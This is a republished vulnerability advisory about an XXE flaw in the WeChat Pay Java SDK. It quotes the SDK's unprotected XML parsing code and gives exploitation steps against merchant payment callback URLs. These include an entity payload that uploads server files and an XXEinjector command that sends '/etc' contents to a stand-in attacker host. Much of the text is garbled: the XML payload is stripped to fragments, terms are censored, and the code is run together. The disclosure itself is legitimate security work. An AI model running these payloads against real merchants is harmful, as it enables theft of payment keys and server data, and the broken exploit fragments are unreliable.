Shulou(Shulou.com)06/01 Report--

XXE vulnerability exists in WeChat Pay SDK

Source of vulnerability information:

Http://seclists.org/fulldisclosure/2018/Jul/3

Https://xz.aliyun.com/t/2426

Affected version of 0x00:

JAVA SDK,WxPayAPI_JAVA_v3, it is recommended that companies that use this version conduct abnormal payment troubleshooting.

Wechat provides callback callback function in JAVA version of SDK to help merchants receive asynchronous payment results. This API accepts data in XML format, and × × users can construct malicious callback data (XML format) to steal any information on merchant servers. Once xxx has obtained the security key of key payment (md5-key and merchant information, it will be possible to pay for any item with 0 yuan directly)

0x01 vulnerability details The SDK in this page: https://pay.weixin.qq.com/wiki/doc/api/jsapi.phpchapter=11_1 Just in java vision: https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip or https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o6ud/view(Backup) README.md in WxPayApi_JAVA_v3.zip,it show more details: notify code example: [String notifyData = "...." MyConfig config = new MyConfig (); WXPay wxpay = new WXPay (config); / / conver to map Map notifyMap = WXPayUtil.xmlToMap (notifyData); if (wxpay.isPayResultNotifySignatureValid (notifyMap)) {/ / do business logic} else {}] WXPayUtil source code [public static Map xmlToMap (String strXML) throwsException {try {Map data = new HashMap () / * not disabled xxe * / / start parse DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance (); DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder (); InputStream stream = new ByteArrayInputStream (strXML.getBytes ("UTF-8")); org.w3c.dom.Document doc = documentBuilder.parse (stream); / / end parse doc.getDocumentElement () .normalize () NodeList nodeList = doc.getDocumentElement () .getChildNodes (); for (int idx = 0; idx

< nodeList.getLength(); ++idx) { Node node = nodeList.item(idx); if (node.getNodeType() == Node.ELEMENT_NODE) { org.w3c.dom.Element element = (org.w3c.dom.Element) node; data.put(element.getNodeName(), element.getTextContent()); } } try { stream.close(); } catch (Exception ex) { // do nothing } return data; } catch (Exception ex) { WXPayUtil.getLogger().warn("Invalid XML, can not convert tomap. Error message: {}. XML content: {}", ex.getMessage(), strXML); throw ex; } }] 0x02利用细节 Post merchant notification url with payload: 找到商家的notify %xxe;]>

Data.dtd:%shell;%upload;or use XXEinjector tool [https://github.com/enjoiz/XXEinjector] ruby XXEinjector.rb-host=attacker-path=/etc-file=req.txt-sslreq.txt: POST merchant_notification_url HTTP/1.1Host: merchant_notification_url_hostUser-Agent: curl/7.43.0Accept: * / * Content-Length: 57Content-Type: application/x-www-form-urlencodedXXEINJECT

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.